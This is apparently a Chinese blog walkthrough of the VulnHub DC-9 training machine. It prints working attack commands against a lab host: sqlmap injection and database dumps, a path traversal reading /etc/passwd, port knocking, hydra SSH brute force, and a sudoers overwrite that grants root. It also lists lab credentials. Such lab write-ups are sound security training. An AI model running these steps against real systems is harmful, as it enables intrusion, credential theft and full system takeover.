渗透环境DC-9:https://www.vulnhub.com/entry/dc-9,412/
攻击机:192.168.168.128
靶机:192.168.168.137

信息收集

1
2
nmap -sP 192.168.168.0/24
nmap -sS -p- 192.168.168.137

img

开放的是80端口,访问

img

渗透

发现有一个search框,可能存在sql注入,抓包扔到sqlmap试试

1
sqlmap -r post.txt

img

确认存在sql注入
后面就是常规的查看数据库了, 因为不是dba所以不能用sqlmap getshell

1
sqlmap -r post.txt --dbs

img

有Staff与users这两个相关的数据库
看看这两个数据库有什么东西

1
sqlmap -r post.txt -D Staff --dump 

img

下面的admin应该是后台的登录账号
这里的加密可以用sql自带的加密进行破解,也可以到md5解密网页破解
账号:admin
密码:transorbital1

1
sqlmap -r post.txt -D users --dump 

img

又是一些账号密码先记录下来吧

登录admin看看先

img

有这样的字眼,可能有文件包含,试试

1
http://192.168.168.137/welcome.php?file=../../../../../etc/passwd

img

确实有,然后我就不会做了,尴尬!!!
看看其他师傅的做法
有这么的一个文件与ssh端口有关knockd.conf

1
view-source:http://192.168.168.137/welcome.php?file=../../../../../etc/knockd.conf

img

我们用nmap对这3个端口进行访问就能开ssh的锁了

1
2
3
nmap -sS -p 7469 192.168.168.137
nmap -sS -p 8475 192.168.168.137
nmap -sS -p 9842 192.168.168.137

img

开锁成功
使用hydra进行爆破,字典是users数据库中的账号和密码

1
hydra -L user.txt -P password.txt  192.168.168.137 ssh

img

有三个账号都上上看看有什么文件啥的

1
ls -a //可以看到隐藏的文件

在janitor用户下发现了一些密码

img

接着用hydra继续爆破

img

又多了一个用户啊,登录看看
login:fredf
password:B4-Tru3-001
查看可用信息

提权

img

发现/opt/devstuff/dist/test/test
去看看,直接执行没有什么反应,看看源文件

img

argv[1]是读取的文件,argv[2]是将argv[1]文件的内容写入的目标
ok,这里我们把东西写入/etc/sudoers

1
2
echo "fredf ALL=(ALL)NOPASSWD: ALL" > /tmp/sudoers
sudo /opt/devstuff/dist/test/test /tmp/sudoers /etc/sudoers

这样就ok啦

1
sudo su

提权成功,然后就是取拿flag了

img

ALL CLEAR!!!!

1
2
DC系列到处就结束了,从中学到了很多的思路,流程什么的,收获很多,后面对学到的东西做个总结啥的,方便以后使用。
本次的ssh锁可以说是本次的一个大收获呢,就这样把。